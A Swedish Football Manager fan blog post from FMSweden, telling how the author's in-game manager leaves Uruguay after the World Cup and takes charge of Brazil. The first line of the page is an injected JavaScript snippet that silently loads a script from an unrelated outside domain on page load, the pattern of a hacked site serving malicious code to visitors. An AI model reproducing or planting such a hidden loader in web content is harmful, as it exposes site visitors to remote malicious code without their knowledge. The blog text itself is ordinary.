;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nya utmaningar – FMSweden
Meny Stäng

Nya utmaningar

Efter det extremt tunga uttåget i VM med Uruguay, var det nära Devran NH Bagis la taktiktavlan på hyllan. Det fanns ingen motivation kvar och nationell tjänst hade ju gått sådär. MEN… så kom världens bästa landslag och knackade på dörren efter ett misslyckat VM. 

Efter att Kroatien gjort 1-2 i den 121:a minuten i VM:s 16-delsfinal, tog Bagis semester och åkte hem till Turkiet. Han behövde komma bort från allt. SportchefsDanne hade gjort klart att hans resa var slut nu. Det fanns helt enkelt inte tid eller motivation att fortsätta jaga lyckan.

Devran tyckte dock att det fanns ett jobb till i pipelinen och det skulle kanske bli sista, eller så hittades det en drivkraft att ta detta vidare en stund till.

Efter 3 veckor hemma i Batman, Turkiet, så kom det plötsligt lite jobberbjudanden på den censurerade mailen.

Först ville Sampdoria, Granada, Kaiserslauten och Juventus kontraktera Bagis. Sen var det Nigeria, Luxemburg, Kanada och Litauen som försökte. NEEEEE, det var det ju inte.

Det var Frankrike, Spanien, Belgien, Argentina och till slut så kom den sista bossen vad gäller landslagsspel. BRASILIEN!!!

Devran NH Bagis ryggar inte från en utmaning och efter att Brasilien åkt ur VM i kvartsfinal, så rök Fernandinho som förbundskapten, ja den Fernandinho.

Det är Copa America, OS och VM på agendan och nu är det dags för den turkiske demonen från Batman att sätta sin prägel på fotbollens största scen.

Tills VM-kvalet börjar får ni ha en trevlig helg och ha med er att Devran NH Bagis alterego Tobias von Hajsen jobbar på med 16 Weeks of Hell. Fem veckor är snart avklarade och 9 kg har trillat av pinn.

SKÅL och Broccoli på er.

Tobbe

 

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar